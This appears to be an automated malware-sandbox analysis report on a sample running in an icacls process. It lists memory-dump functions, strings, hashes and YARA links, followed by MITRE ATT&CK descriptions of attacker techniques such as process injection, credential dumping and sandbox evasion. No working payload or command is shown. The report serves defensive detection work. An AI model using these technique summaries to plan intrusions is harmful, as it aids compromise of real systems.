@@@@, xrefs: 02D2E217
@@@?, xrefs: 02D2E153
?, xrefs: 02D2E2D0
@@@@, xrefs: 02D2E2BF
-./0, xrefs: 02D2E1D1
@@@@, xrefs: 02D2E1FB
@@@@, xrefs: 02D2E29C
@@@@, xrefs: 02D2E2B1
@@@@, xrefs: 02D2E241
@@@@, xrefs: 02D2E1F4
@@@@, xrefs: 02D2E272
@@@@, xrefs: 02D2E225
@@@@, xrefs: 02D2E280
@@@@, xrefs: 02D2E1E6
123@, xrefs: 02D2E1D8
<=@@, xrefs: 02D2E168
@@@@, xrefs: 02D2E279
@@@@, xrefs: 02D2E25D
89:;, xrefs: 02D2E161
@@@@, xrefs: 02D2E24F
@@@@, xrefs: 02D2E16F
@@@@, xrefs: 02D2E1ED
@@@@, xrefs: 02D2E209
@@@@, xrefs: 02D2E2AA
@@@@, xrefs: 02D2E248
)*+,, xrefs: 02D2E1CA
@@@@, xrefs: 02D2E1DF
@@@@, xrefs: 02D2E22C
4567, xrefs: 02D2E15A
@@@@, xrefs: 02D2E256
@@@@, xrefs: 02D2E21E

Memory Dump Source

Source File: 0000000D.00000002.4128177079.0000000002D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2d20000_icacls.jbxd

Similarity

API ID:
String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
API String ID: 0-3558027158
Opcode ID: db33118f107f3136319702e206d1d9d82bdba1a412b02d96fb44071c58b0588d
Instruction ID: 6cbbd041741a29e12413ba32b7dd4cf676578921888b6c15e3befc842184ebc6
Opcode Fuzzy Hash: db33118f107f3136319702e206d1d9d82bdba1a412b02d96fb44071c58b0588d
Instruction Fuzzy Hash: 9A9151F04082948AC7158F55A0652AFFFB1EBC6305F15816DE7E6BB243C3BE8949CB85

Function 02EF2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 02EF293C
___swprintf_l.LIBCMT ref: 02EF295E
___swprintf_l.LIBCMT ref: 02EF29A3
___swprintf_l.LIBCMT ref: 02F2A52E

Strings

::%hs%u.%u.%u.%u, xrefs: 02F2A527
:%u.%u.%u.%u, xrefs: 02F2A5B8
::ffff:0:%u.%u.%u.%u, xrefs: 02F2A54E
ffff:, xrefs: 02F2A504

Memory Dump Source

Source File: 0000000D.00000002.4128320775.0000000002E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E80000, based on PE: true

Associated: 0000000D.00000002.4128320775.0000000002FA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4128320775.0000000002FAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4128320775.000000000301E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2e80000_icacls.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 9fb1d7ea1c63d3a88717765594d95332ea83d9ba2b24fbd485b96d5ee85e418e
Instruction ID: 900d90a0c488c89ff478fd248fbf9c81a0a9978f64155e2e1176dfeb41c1ff82
Opcode Fuzzy Hash: 9fb1d7ea1c63d3a88717765594d95332ea83d9ba2b24fbd485b96d5ee85e418e
Instruction Fuzzy Hash: A45107B2A40156BFDB50DBA88890A7FF7B8BB08344750D169EBA9D7641D734DE04CBA0

Function 02F62410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 02F624A6
___swprintf_l.LIBCMT ref: 02F624E2
___swprintf_l.LIBCMT ref: 02F6257D
___swprintf_l.LIBCMT ref: 02F625A3
___swprintf_l.LIBCMT ref: 02F625C8
___swprintf_l.LIBCMT ref: 02F62608

Strings

:%u.%u.%u.%u, xrefs: 02F625FF
::%hs%u.%u.%u.%u, xrefs: 02F6249E
::ffff:0:%u.%u.%u.%u, xrefs: 02F624DA
ffff:, xrefs: 02F6247D, 02F6249D

Memory Dump Source

Source File: 0000000D.00000002.4128320775.0000000002E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E80000, based on PE: true

Associated: 0000000D.00000002.4128320775.0000000002FA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4128320775.0000000002FAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4128320775.000000000301E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2e80000_icacls.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 87d6d1bb4c02e9bc782f04071f3a118e7d5e60f5f57ed70a20783d4da8266a3e
Instruction ID: 0cef08283401eae448ab9835a48d8322e26c973128876c676bfdbaee1548719f
Opcode Fuzzy Hash: 87d6d1bb4c02e9bc782f04071f3a118e7d5e60f5f57ed70a20783d4da8266a3e
Instruction Fuzzy Hash: 4551F575A00645AEDB30DE5CCDA497FBBF9EB44280B048459EAD6C7681EB74EE40CB60

Function 02EE7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

ExecuteOptions, xrefs: 02F246A0
Execute=1, xrefs: 02F24713
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02F24655
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02F24725
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 02F246FC
CLIENT(ntdll): Processing section info %ws..., xrefs: 02F24787
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 02F24742

Memory Dump Source

Source File: 0000000D.00000002.4128320775.0000000002E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E80000, based on PE: true

Associated: 0000000D.00000002.4128320775.0000000002FA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4128320775.0000000002FAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4128320775.000000000301E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2e80000_icacls.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: a89f51bd48e6449a33b7fb0e601c8244eb061da17c72c48bb34110ceb588dd37
Instruction ID: 9c494ce681296b5ffb98006a2c1f9bc7cf3458072d261083e2e56aef8d936544
Opcode Fuzzy Hash: a89f51bd48e6449a33b7fb0e601c8244eb061da17c72c48bb34110ceb588dd37
Instruction Fuzzy Hash: A1513D71A8021EBAEF11EBA4DC45FEEB7B9EF05348F045099E606AB190D7709E45CF50

Function 02F86940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.4128320775.0000000002E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E80000, based on PE: true

Associated: 0000000D.00000002.4128320775.0000000002FA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4128320775.0000000002FAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4128320775.000000000301E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2e80000_icacls.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
Instruction ID: 7bee931cf8cedccec6a10c7e32018a6ee9bcebaa9047d4da8accffaa1f665f9c
Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
Instruction Fuzzy Hash: 70021671508341AFD305EF18C890A6BFBEAEFC8744F14892DFA959B264DB31E905CB52

Function 02EFB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 02EFB6BF

Strings

+, xrefs: 02EFB65A
-, xrefs: 02EFB650
0, xrefs: 02EFB66F
0, xrefs: 02EFB695

Memory Dump Source

Source File: 0000000D.00000002.4128320775.0000000002E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E80000, based on PE: true

Associated: 0000000D.00000002.4128320775.0000000002FA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4128320775.0000000002FAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4128320775.000000000301E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2e80000_icacls.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-$0$0
API String ID: 1302938615-699404926
Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
Instruction ID: d1a9a016b1ff087cc2a9618d4d1ac3f088af6861a428c53a784a40f19c73f611
Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
Instruction Fuzzy Hash: 0081D470E852898EDF648E68C8507FEBBB6AF8D31CF18E25DDA51A72D0C7348440CB50

Function 02F620E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 02F6214F
___swprintf_l.LIBCMT ref: 02F62172

Strings

%%%u, xrefs: 02F62146
[, xrefs: 02F6212B
]:%u, xrefs: 02F62169

Memory Dump Source

Source File: 0000000D.00000002.4128320775.0000000002E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E80000, based on PE: true

Associated: 0000000D.00000002.4128320775.0000000002FA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4128320775.0000000002FAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4128320775.000000000301E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2e80000_icacls.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$[$]:%u
API String ID: 48624451-2819853543
Opcode ID: 96296bfa3f5719af5959b116f88c76b599641a11b0419ff8a766a5db43494330
Instruction ID: 3428b3a895aa8370b95fe9ccba2d934f832d60a94ef3d5b52f521fe1f75a1f70
Opcode Fuzzy Hash: 96296bfa3f5719af5959b116f88c76b599641a11b0419ff8a766a5db43494330
Instruction Fuzzy Hash: D9212F76E00119ABEB10DE69DC54AFEB7E9EF54784F444116EE05E3241EB309A018BA1

Function 02EDF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON

Download Yara Rule

Strings

RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 02F202E7
RTL: Re-Waiting, xrefs: 02F2031E
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 02F202BD

Memory Dump Source

Source File: 0000000D.00000002.4128320775.0000000002E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E80000, based on PE: true

Associated: 0000000D.00000002.4128320775.0000000002FA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4128320775.0000000002FAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4128320775.000000000301E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2e80000_icacls.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
API String ID: 0-2474120054
Opcode ID: 321a306becdc16e4e26c75e88e5b0ceede72d784220375d6fbe3b64ea1734151
Instruction ID: c254222e589c2d4552d32e11d12a9fee525353693e55d79cb8967ddb595435a9
Opcode Fuzzy Hash: 321a306becdc16e4e26c75e88e5b0ceede72d784220375d6fbe3b64ea1734151
Instruction Fuzzy Hash: 96E10331A48741DFD724CF28C880B6AB7E1BF85358F148A5DF6A68B6E0DB74D845CB42

Function 02EEBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON

Download Yara Rule

Strings

RTL: Re-Waiting, xrefs: 02F27BAC
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 02F27B7F
RTL: Resource at %p, xrefs: 02F27B8E

Memory Dump Source

Source File: 0000000D.00000002.4128320775.0000000002E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E80000, based on PE: true

Associated: 0000000D.00000002.4128320775.0000000002FA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4128320775.0000000002FAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4128320775.000000000301E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2e80000_icacls.jbxd

Similarity

API ID:
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 0-871070163
Opcode ID: a78158e6bea58f475b6d852093e5588196f9a0764eab514fb0fb92385d308a09
Instruction ID: 92d0cae6fb2a410c1c8d9f3f6aa69530b98a9519e321143375bcd273bb523b60
Opcode Fuzzy Hash: a78158e6bea58f475b6d852093e5588196f9a0764eab514fb0fb92385d308a09
Instruction Fuzzy Hash: C641E0317417029BDB24DE25CC40B6AB7E6FF89718F005A1DEA5ADB690DB31E805CB92

Function 02EEB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02F2728C

Strings

RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 02F27294
RTL: Re-Waiting, xrefs: 02F272C1
RTL: Resource at %p, xrefs: 02F272A3

Memory Dump Source

Source File: 0000000D.00000002.4128320775.0000000002E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E80000, based on PE: true

Associated: 0000000D.00000002.4128320775.0000000002FA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4128320775.0000000002FAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4128320775.000000000301E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2e80000_icacls.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-605551621
Opcode ID: 3104c5d792d15aacb19ad654ae80eb99b8543d9c8dbd47dfe73b8ccd9b8fcf69
Instruction ID: fe89e6284dbe20ab4d6e28d7d3307c15487c7e278874a6bead9e44e963b5f483
Opcode Fuzzy Hash: 3104c5d792d15aacb19ad654ae80eb99b8543d9c8dbd47dfe73b8ccd9b8fcf69
Instruction Fuzzy Hash: F7413331B40212ABDB20EE24CC41B66B7A6FF45758F10561DFA56EB280DB30F816CBD0

Function 02F62300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 02F6238D
___swprintf_l.LIBCMT ref: 02F623B3

Strings

%%%u, xrefs: 02F62384
]:%u, xrefs: 02F623AA

Memory Dump Source

Source File: 0000000D.00000002.4128320775.0000000002E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E80000, based on PE: true

Associated: 0000000D.00000002.4128320775.0000000002FA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4128320775.0000000002FAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4128320775.000000000301E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2e80000_icacls.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: 6dc5589550c9a8ddacf143d0b9eaed8705e0e85eb641a9e9647eaaae7b1fdf24
Instruction ID: 4a67955c1d4750478911427842ff003f8acd5f39de6ae66c55789845fdd0d41c
Opcode Fuzzy Hash: 6dc5589550c9a8ddacf143d0b9eaed8705e0e85eb641a9e9647eaaae7b1fdf24
Instruction Fuzzy Hash: E1318672A002199FDB20DE28CC45BFEB7B8EB44754F444596ED49E3240EB30AA448FA0

Function 02EF7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 02EF7E8B

Strings

+, xrefs: 02EF7DE8
-, xrefs: 02EF7DDD

Memory Dump Source

Source File: 0000000D.00000002.4128320775.0000000002E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E80000, based on PE: true

Associated: 0000000D.00000002.4128320775.0000000002FA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4128320775.0000000002FAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4128320775.000000000301E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2e80000_icacls.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
Instruction ID: 981961659e3c2bd90e3b1554fe0974bd1fd6165827121de8adeaaf8a5acd2c2d
Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
Instruction Fuzzy Hash: E491C771E802059BDBA4DE6AC8807FEF7A5FF45328F55E61AEA55E72C0E7308941CB10

Function 02EB9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

$, xrefs: 02EB9191
@, xrefs: 02EB9175

Memory Dump Source

Source File: 0000000D.00000002.4128320775.0000000002E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E80000, based on PE: true

Associated: 0000000D.00000002.4128320775.0000000002FA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4128320775.0000000002FAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4128320775.000000000301E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2e80000_icacls.jbxd

Similarity

API ID:
String ID: $$@
API String ID: 0-1194432280
Opcode ID: ff3010fb7130b6887b5ff524273f89257e0166ebce93f57e0a9ab8788d4c5aaa
Instruction ID: 6e7c58dd8e472cbb173ecb312792abb17ac912a37e879c15c8c7e076a1c4e186
Opcode Fuzzy Hash: ff3010fb7130b6887b5ff524273f89257e0166ebce93f57e0a9ab8788d4c5aaa
Instruction Fuzzy Hash: 32812C71D402699BDB35DB94CD44BEEB7B4AF08754F0081EAEA19B7280D7305E85CFA0

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Process: Process Creation, Service: Service Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

